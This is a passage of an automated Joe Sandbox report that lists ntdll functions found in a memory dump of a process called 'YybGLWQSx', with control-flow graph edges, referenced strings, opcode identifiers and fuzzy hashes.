261->267 264->258 270->246 272 1622976-1622979 270->272 272->253 273 162297f 272->273 273->267
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID:
                        • API String ID: 48624451-0
                        • Opcode ID: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                        • Instruction ID: d3c6df49288c10b7ef080d3bc8b1f898abe36b88b8b289dc30a0fa0998e97aaa
                        • Opcode Fuzzy Hash: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                        • Instruction Fuzzy Hash: 0651F7B6B00526BFCB21DB9D8CA097EFBB8BB48240B54826DF465D7641D374DE04CBA0
                        Function 015FA250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 274 15fa250-15fa26f 275 15fa58d-15fa594 274->275 276 15fa275-15fa291 274->276 275->276 277 15fa59a-16479bb 275->277 278 16479e6-16479eb 276->278 279 15fa297-15fa2a0 276->279 277->276 284 16479c1-16479c6 277->284 279->278 281 15fa2a6-15fa2ac 279->281 282 15fa6ba-15fa6bc 281->282 283 15fa2b2-15fa2b4 281->283 285 15fa2ba-15fa2bd 282->285 286 15fa6c2 282->286 283->278 283->285 287 15fa473-15fa479 284->287 285->278 288 15fa2c3-15fa2c6 285->288 286->288 289 15fa2da-15fa2dd 288->289 290 15fa2c8-15fa2d1 288->290 293 15fa6c7-15fa6d0 289->293 294 15fa2e3-15fa32b 289->294 291 15fa2d7 290->291 292 16479cb-16479d5 290->292 291->289 296 16479da-16479e3 call 166f290 292->296 293->294 295 15fa6d6-16479ff 293->295 297 15fa330-15fa335 294->297 295->296 296->278 300 15fa47c-15fa47f 297->300 301 15fa33b-15fa343 297->301 302 15fa34f-15fa35d 300->302 303 15fa485-15fa488 300->303 301->302 305 15fa345-15fa349 301->305 306 15fa48e-15fa49e 302->306 309 15fa363-15fa368 302->309 303->306 307 1647a16-1647a19 303->307 305->302 308 15fa59f-15fa5a8 305->308 306->307 312 15fa4a4-15fa4ad 306->312 310 15fa36c-15fa36e 307->310 311 1647a1f-1647a24 307->311 313 15fa5aa-15fa5ac 308->313 314 15fa5c0-15fa5c3 308->314 309->310 319 1647a26 310->319 320 15fa374-15fa38c call 15fa6e0 310->320 315 1647a2b 311->315 312->310 313->302 316 15fa5b2-15fa5bb 313->316 317 1647a01 314->317 318 15fa5c9-15fa5cc 314->318 321 1647a2d-1647a2f 315->321 316->310 322 1647a0c 317->322 318->322 323 15fa5d2-15fa5d5 318->323 319->315 327 15fa4b2-15fa4b9 320->327 328 15fa392-15fa3ba 320->328 321->287 325 1647a35 321->325 322->307 323->313 329 15fa3bc-15fa3be 327->329 330 15fa4bf-15fa4c2 327->330 328->329 329->321 331 15fa3c4-15fa3cb 329->331 330->329 332 15fa4c8-15fa4d3 330->332 333 1647ae0 331->333 334 15fa3d1-15fa3d4 331->334 332->297 336 1647ae4-1647afc call 166f290 333->336 335 15fa3e0-15fa3ea 334->335 335->336 338 15fa3f0-15fa40c call 15fa840 335->338 336->287 342 15fa5d7-15fa5e0 338->342 343 15fa412-15fa417 338->343 345 15fa5e2-15fa5eb 342->345 346 15fa601-15fa603 342->346 343->287 344 15fa419-15fa43d 343->344 349 15fa440-15fa443 344->349 345->346 350 15fa5ed-15fa5f1 345->350 347 15fa629-15fa631 346->347 348 15fa605-15fa623 call 15e4508 346->348 348->287 348->347 354 15fa449-15fa44c 349->354 355 15fa4d8-15fa4dc 349->355 351 15fa5f7-15fa5fb 350->351 352 15fa681-15fa6ab RtlDebugPrintTimes 350->352 351->346 351->352 352->346 373 15fa6b1-15fa6b5 352->373 357 1647ad6 354->357 358 15fa452-15fa454 354->358 359 15fa4e2-15fa4e5 355->359 360 1647a3a-1647a42 355->360 357->333 363 15fa45a-15fa461 358->363 364 15fa520-15fa539 call 15fa6e0 358->364 361 15fa634-15fa64a 359->361 365 15fa4eb-15fa4ee 359->365 360->361 362 1647a48-1647a4c 360->362 367 15fa4f4-15fa50c 361->367 368 15fa650-15fa659 361->368 362->361 369 1647a52-1647a5b 362->369 370 15fa57b-15fa582 363->370 371 15fa467-15fa46c 363->371 383 15fa53f-15fa567 364->383 384 15fa65e-15fa665 364->384 365->354 365->367 367->354 378 15fa512-15fa51b 367->378 368->358 375 1647a85-1647a87 369->375 376 1647a5d-1647a60 369->376 370->335 374 15fa588 370->374 371->287 377 15fa46e 371->377 373->346 374->333 375->361 382 1647a8d-1647a96 375->382 380 1647a62-1647a6c 376->380 381 1647a6e-1647a71 376->381 377->287 378->358 387 1647a81 380->387 388 1647a73-1647a7c 381->388 389 1647a7e 381->389 382->358 385 15fa569-15fa56b 383->385 384->385 386 15fa66b-15fa66e 384->386 385->371 390 15fa571-15fa573 385->390 386->385 391 15fa674-15fa67c 386->391 387->375 388->382 389->387 392 15fa579 390->392 393 1647a9b-1647aa4 390->393 391->349 392->370 393->392 394 1647aaa-1647ab0 393->394 394->392 395 1647ab6-1647abe 394->395 395->392 396 1647ac4-1647acf 395->396 396->395 397 1647ad1 396->397 397->392
                        Strings
                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 016479D0, 016479F5
                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 016479D5
                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 016479FA
                        • SsHd, xrefs: 015FA3E4
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                        • API String ID: 0-929470617
                        • Opcode ID: ad277758ac41e3be3339dbb28dccebf4984ddaf003ddfce22a8e9ae6b7a44556
                        • Instruction ID: 1bdefb15e18437b7a228223c4f0019739ecd8c79a7d22ee3b92d7f9e82dea5c9
                        • Opcode Fuzzy Hash: ad277758ac41e3be3339dbb28dccebf4984ddaf003ddfce22a8e9ae6b7a44556
                        • Instruction Fuzzy Hash: 09E1C2706043428FE725CE28C898B6ABBE1BB84354F144A2DEA69CF3D1D731D985CB53
                        Function 015FD770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 398 15fd770-15fd7ab 399 15fd9e7-15fd9ee 398->399 400 15fd7b1-15fd7bb 398->400 399->400 403 15fd9f4-164932c 399->403 401 1649357 400->401 402 15fd7c1-15fd7ca 400->402 409 1649361-1649370 401->409 402->401 405 15fd7d0-15fd7d3 402->405 403->400 408 1649332-1649337 403->408 406 15fd9da-15fd9dc 405->406 407 15fd7d9-15fd7db 405->407 410 15fd7e1-15fd7e4 406->410 412 15fd9e2 406->412 407->401 407->410 411 15fd927-15fd938 call 1624c30 408->411 413 164934b-1649354 call 166f290 409->413 410->401 414 15fd7ea-15fd7ed 410->414 412->414 413->401 417 15fd9f9-15fda02 414->417 418 15fd7f3-15fd7f6 414->418 417->418 421 15fda08-1649346 417->421 422 15fda0d-15fda16 418->422 423 15fd7fc-15fd848 call 15fd660 418->423 421->413 422->423 425 15fda1c 422->425 423->411 428 15fd84e-15fd852 423->428 425->409 428->411 429 15fd858-15fd85f 428->429 430 15fd865-15fd869 429->430 431 15fd9d1-15fd9d5 429->431 433 15fd870-15fd87a 430->433 432 1649563-164957b call 166f290 431->432 432->411 433->432 434 15fd880-15fd887 433->434 436 15fd8ed-15fd90d 434->436 437 15fd889-15fd88d 434->437 441 15fd910-15fd913 436->441 439 1649372 437->439 440 15fd893-15fd898 437->440 443 1649379-164937b 439->443 442 15fd89e-15fd8a5 440->442 440->443 444 15fd93b-15fd940 441->444 445 15fd915-15fd918 441->445 449 15fd8ab-15fd8e3 call 1628250 442->449 450 16493ea-16493ed 442->450 443->442 448 1649381-16493aa 443->448 446 16494d3-16494db 444->446 447 15fd946-15fd949 444->447 451 15fd91e-15fd920 445->451 452 1649559-164955e 445->452 453 16494e1-16494e5 446->453 454 15fda21-15fda2f 446->454 447->454 455 15fd94f-15fd952 447->455 448->436 456 16493b0-16493ca call 16382c0 448->456 472 15fd8e5-15fd8e7 449->472 458 16493f1-1649400 call 16382c0 450->458 459 15fd922 451->459 460 15fd971-15fd98c call 15fa6e0 451->460 452->411 453->454 461 16494eb-16494f4 453->461 462 15fd954-15fd964 454->462 464 15fda35-15fda3e 454->464 455->445 455->462 456->472 477 16493d0-16493e3 456->477 482 1649417 458->482 483 1649402-1649410 458->483 459->411 479 1649528-164952d 460->479 480 15fd992-15fd9ba 460->480 468 16494f6-16494f9 461->468 469 1649512-1649514 461->469 462->445 470 15fd966-15fd96f 462->470 464->451 475 1649503-1649506 468->475 476 16494fb-1649501 468->476 469->454 481 164951a-1649523 469->481 470->451 472->436 478 1649420-1649424 472->478 485 164950f 475->485 486 1649508-164950d 475->486 476->469 477->456 487 16493e5 477->487 478->436 484 164942a-1649430 478->484 488 15fd9bc-15fd9be 479->488 489 1649533-1649536 479->489 480->488 481->451 482->478 483->458 490 1649412 483->490 491 1649457-1649460 484->491 492 1649432-164944f 484->492 485->469 486->481 487->436 493 15fd9c4-15fd9cb 488->493 494 1649549-164954e 488->494 489->488 495 164953c-1649544 489->495 490->436 497 16494a7-16494a9 491->497 498 1649462-1649467 491->498 492->491 496 1649451-1649454 492->496 493->431 493->433 494->411 499 1649554 494->499 495->441 496->491 501 16494cc-16494ce 497->501 502 16494ab-16494c6 call 15e4508 497->502 498->497 500 1649469-164946d 498->500 499->452 503 1649475-16494a1 RtlDebugPrintTimes 500->503 504 164946f-1649473 500->504 501->411 502->411 502->501 503->497 508 16494a3 503->508 504->497 504->503 508->497
                        APIs
                        Strings
                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 01649341, 01649366
                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01649346
                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0164936B
                        • GsHd, xrefs: 015FD874
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                        • API String ID: 3446177414-576511823
                        • Opcode ID: 5ddbeb9de10cc6ab386dc7094436a1ebb4cb69b8b9e2774832a64accd3795286
                        • Instruction ID: fd56919ff30e4df91eb93b82542bfcb023546f46c733461664b9df3dd423c379
                        • Opcode Fuzzy Hash: 5ddbeb9de10cc6ab386dc7094436a1ebb4cb69b8b9e2774832a64accd3795286
                        • Instruction Fuzzy Hash: A3E1B2716043428FDB25CF98C980B6BBBF5BF89318F044A2DEA958F281D771D944CB92
                        Function 0162B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 509 162b5ec-162b5fc 510 162b600-162b602 509->510 511 162b5fe 509->511 512 162b830-162b844 call 1624b87 510->512 513 162b608-162b60d 510->513 511->510 514 162b621-162b62e 513->514 515 162b60f-162b612 513->515 518 162b631-162b63d call 162b5e6 514->518 515->512 517 162b618-162b61b 515->517 517->512 517->514 522 162b64a-162b653 518->522 523 162b63f-162b644 518->523 525 162b655-162b658 522->525 526 162b65a-162b65d 522->526 523->523 524 162b646-162b648 523->524 524->518 527 162b65f-162b662 525->527 526->527 528 162b665-162b66d 526->528 527->528 529 162b690-162b693 528->529 530 162b66f-162b672 528->530 531 162b695-162b698 529->531 532 162b6ad-162b6d4 call 1626810 529->532 533 162b674 530->533 534 162b67c-162b680 530->534 531->532 538 162b69a-162b69e 531->538 544 162b6d7-162b6e9 call 162b5e6 532->544 535 162b676-162b67a 533->535 536 162b682-162b684 534->536 537 162b68a-162b68d 534->537 535->532 536->537 540 162b686-162b688 536->540 537->529 541 162b6a0-162b6a2 538->541 542 162b6a4-162b6aa 538->542 540->535 541->532 541->542 542->532 547 162b6f3-162b704 call 162b5e6 544->547 548 162b6eb-162b6f1 544->548 554 162b791-162b794 547->554 555 162b70a-162b713 547->555 549 162b71b-162b727 548->549 552 162b797 549->552 553 162b729-162b735 549->553 556 162b79a-162b79e 552->556 557 162b766-162b769 553->557 558 162b737 553->558 554->552 560 162b715 555->560 561 162b718 555->561 562 162b7a0-162b7a2 556->562 563 162b7ad-162b7b0 556->563 559 162b76c-162b786 call 1626580 557->559 564 162b739-162b73c 558->564 565 162b73e-162b741 558->565 584 162b789-162b78c 559->584 560->561 561->549 567 162b7a7-162b7ab 562->567 568 162b7a4 562->568 571 162b7b2-162b7b5 563->571 572 162b7df-162b7ed call 166d8b0 563->572 564->557 564->565 569 162b743-162b746 565->569 570 162b757-162b762 565->570 576 162b815-162b81a 567->576 568->567 569->570 577 162b748-162b74e 569->577 570->556 573 162b764 570->573 578 162b7b7-162b7ba 571->578 579 162b80f 571->579 592 162b7f7-162b7fa 572->592 593 162b7ef-162b7f5 572->593 573->584 582 162b81e-162b821 576->582 583 162b81c 576->583 577->559 586 162b750 577->586 580 162b7ce-162b7d3 578->580 581 162b7bc-162b7c1 578->581 587 162b812 579->587 580->579 591 162b7d5 580->591 581->572 588 162b7c3-162b7c6 581->588 589 162b823-162b827 582->589 590 162b829-162b82f 582->590 583->582 584->544 586->570 594 162b752-162b755 586->594 587->576 588->587 595 162b7c8-162b7ca 588->595 589->590 591->572 596 162b7d7-162b7dd 591->596 597 162b805-162b80d 592->597 598 162b7fc-162b803 592->598 593->576 594->559 594->570 595->572 599 162b7cc 595->599 596->572 596->587 597->576 598->576 599->587
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-$0$0
                        • API String ID: 1302938615-699404926
                        • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                        • Instruction ID: 6aec899807205976fea51f60ccfedd1828bd37497e27a9210f0ec36173eabcd9
                        • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                        • Instruction Fuzzy Hash: 3981BD30E05A7A8EEF258E6CCC917FEBBA2EF45320F1C421AD861A7391C77488418F55
                        Function 015E9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 600 15e9126-15e91db call 1637eb0 call 1629020 call 15f9950 607 15e91dd-15e91ee 600->607 608 15e91f1-15e91f8 600->608 608->607 609 15e91fa-15e9201 608->609 609->607 610 15e9203-15e921f call 15fa250 609->610 610->607 613 15e9221-15e9227 610->613 614 15e922d-15e9234 613->614 615 1642518-164251d 613->615 616 15e923a 614->616 617 1642522-1642529 614->617 615->607 618 15e9241-15e929e call 1605b20 616->618 617->618 619 164252f-1642539 617->619 618->607 622 15e92a4-15e92ba call 16005a0 618->622 619->618 622->607 625 15e92c0-164256b RtlDebugPrintTimes 622->625 625->607 628 1642571-164257a 625->628 629 1642580-1642595 call 15fdd20 628->629 630 1642651-164265c 628->630 635 1642597-1642598 call 15f3c70 629->635 636 164259d-16425cb call 15f9950 629->636 632 16426a0-16426a7 630->632 633 164265e-1642669 RtlDebugPrintTimes ReleaseActCtx 630->633 632->607 633->632 635->636 640 1642645-164264c call 1642674 636->640 641 16425cd-16425ea call 15fa250 636->641 640->630 641->640 645 16425ec-16425f2 641->645 646 16425f4-16425f9 645->646 647 16425fb-1642638 call 16005a0 645->647 648 164263f 646->648 647->640 651 164263a 647->651 648->640 651->648
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: $$@
                        • API String ID: 3446177414-1194432280
                        • Opcode ID: 21bdf81b34ba5ccc3f43da9708ed9c610237d4e1b9bb1d8a324e2c037d334ca8
                        • Instruction ID: bd021465cd7f573d9d5995b0b9acdb933ad9e14a4d88cb204c6f846ce5c35c79
                        • Opcode Fuzzy Hash: 21bdf81b34ba5ccc3f43da9708ed9c610237d4e1b9bb1d8a324e2c037d334ca8
                        • Instruction Fuzzy Hash: C0811BB1D002699BDB35CB54CC54BEEBBB4BB48754F1041DAEA19B7280D7309E84CFA4
                        Function 01624960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 652 1624960-162498e 653 1624990-16249b0 RtlDebugPrintTimes 652->653 654 16249b6-16249bd 652->654 653->654 658 1624a6d-1624a70 653->658 655 16249c3-16249c7 654->655 656 1624a68 654->656 655->656 657 16249cd-16249d5 655->657 656->658 657->656 660 16249db-16249df 657->660 660->656 661 16249e5-16249e8 660->661 661->656 662 16249ea-16249ee 661->662 662->656 663 16249f0-16249f4 662->663 663->656 664 16249f6-1624a4c call 1611e46 call 16289a0 * 3 call 1611e46 663->664 675 1624a63-1624a66 664->675 676 1624a4e-1624a51 664->676 675->656 676->675 677 1624a53-1624a5d 676->677 677->675 678 1624a5f-1624a61 677->678 678->658
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: 0Iv$0Iv$0Iv$X
                        • API String ID: 3446177414-728256981
                        • Opcode ID: 14e97215f0421b1cf23ab5cb8db38e3a05624cb36109073ca91af8ecf8b17e8a
                        • Instruction ID: 6a187c24c8547fc18f30edb3722bea538ca75866fd7dcd4782381d20cc3bb765
                        • Opcode Fuzzy Hash: 14e97215f0421b1cf23ab5cb8db38e3a05624cb36109073ca91af8ecf8b17e8a
                        • Instruction Fuzzy Hash: E9317A31E0161AEBCF228EADDC40B8D3BA1AB88759F05501DFD0496249DB708A60CF96
                        Function 0160DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1427 160db00-160db15 1428 160db1b-160db22 1427->1428 1429 164f5f9-164f603 1427->1429 1430 160db28-160db2f 1428->1430 1431 164f608-164f619 RtlDebugPrintTimes 1428->1431 1429->1431 1433 160db35-160db39 1430->1433 1434 164f61e-164f628 GetPEB 1430->1434 1431->1434 1435 160db70-160db7b GetPEB 1433->1435 1436 160db3b-160db51 1433->1436 1438 164f647-164f64c call 15db970 1434->1438 1439 164f62a-164f645 GetPEB call 15db970 1434->1439 1442 160db81 1435->1442 1443 164f703-164f706 1435->1443 1436->1435 1441 160db53-160db6a 1436->1441 1448 164f651-164f683 call 15db970 * 3 GetPEB 1438->1448 1439->1448 1441->1435 1446 164f69b-164f69e 1441->1446 1447 160db86-160db89 1442->1447 1443->1442 1449 164f70c-164f71a GetPEB 1443->1449 1453 164f6a6-164f6ae 1446->1453 1454 164f6a0 1446->1454 1450 164f71f-164f72d GetPEB 1447->1450 1451 160db8f-160db95 1447->1451 1473 164f694 1448->1473 1474 164f685-164f68d 1448->1474 1449->1447 1450->1451 1455 164f733-164f73a 1450->1455 1456 164f6b0-164f6b7 call 160ffa0 1453->1456 1457 164f6ba-164f6c1 1453->1457 1454->1453 1455->1451 1456->1457 1460 164f6c4-164f6d7 1457->1460 1464 164f6e6-164f6ef 1460->1464 1465 164f6d9-164f6e4 call 160bba0 1460->1465 1464->1435 1469 164f6f5-164f6fe call 160f3e0 1464->1469 1465->1460 1469->1435 1473->1446 1474->1473
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                        • API String ID: 3446177414-56086060
                        • Opcode ID: 40c766bce92f1705f08eb232d81b970e1ae7ba3eb6a98d560fc8fdadddede087
                        • Instruction ID: 35c15febab323fb3368af070afdf80630a7596b44ffd478444f332017b2af844
                        • Opcode Fuzzy Hash: 40c766bce92f1705f08eb232d81b970e1ae7ba3eb6a98d560fc8fdadddede087
                        • Instruction Fuzzy Hash: 56415770600A46DFD72ADFACCC85BAAB7A5FF45324F0041ACD5018B3D1CB749880C790
                        Function 01664755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1476 1664755-16647a0 call 1664ec6 1479 16647a2-16647a4 1476->1479 1480 16647b0-16647b6 1476->1480 1481 16647a6-16647ac 1479->1481 1482 16647ae 1479->1482 1483 16647de-16647e0 1480->1483 1481->1480 1482->1480 1484 16647e2 1483->1484 1485 16647b8-16647c5 call 16648a8 1483->1485 1486 1664840-1664842 1484->1486 1493 16647c7-16647c9 1485->1493 1494 16647cb 1485->1494 1488 16647e4-16647f1 call 16648a8 1486->1488 1489 1664844 1486->1489 1488->1489 1500 16647f3-16647fb 1488->1500 1491 1664849-1664851 1489->1491 1497 16647d0-16647d2 1493->1497 1494->1486 1495 16647cd 1494->1495 1495->1497 1498 16647d4-16647d6 1497->1498 1499 16647dc 1497->1499 1498->1499 1501 16647d8-16647da 1498->1501 1499->1483 1502 1664854-166485e 1500->1502 1503 16647fd-1664813 RtlDebugPrintTimes 1500->1503 1501->1483 1502->1491 1504 1664860-16648a6 GetPEB call 165ea12 1502->1504 1503->1502 1508 1664815-166481c 1503->1508 1504->1491 1509 166481e-1664824 1508->1509 1510 1664838-166483e 1508->1510 1509->1486 1511 1664826-166482e 1509->1511 1510->1486 1512 1664832-1664834 1510->1512 1511->1511 1513 1664830 1511->1513 1512->1486 1514 1664836 1512->1514 1513->1486 1514->1510
                        APIs
                        Strings
                        • minkernel\ntdll\ldrredirect.c, xrefs: 01664899
                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01664888
                        • LdrpCheckRedirection, xrefs: 0166488F
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmpDownload File
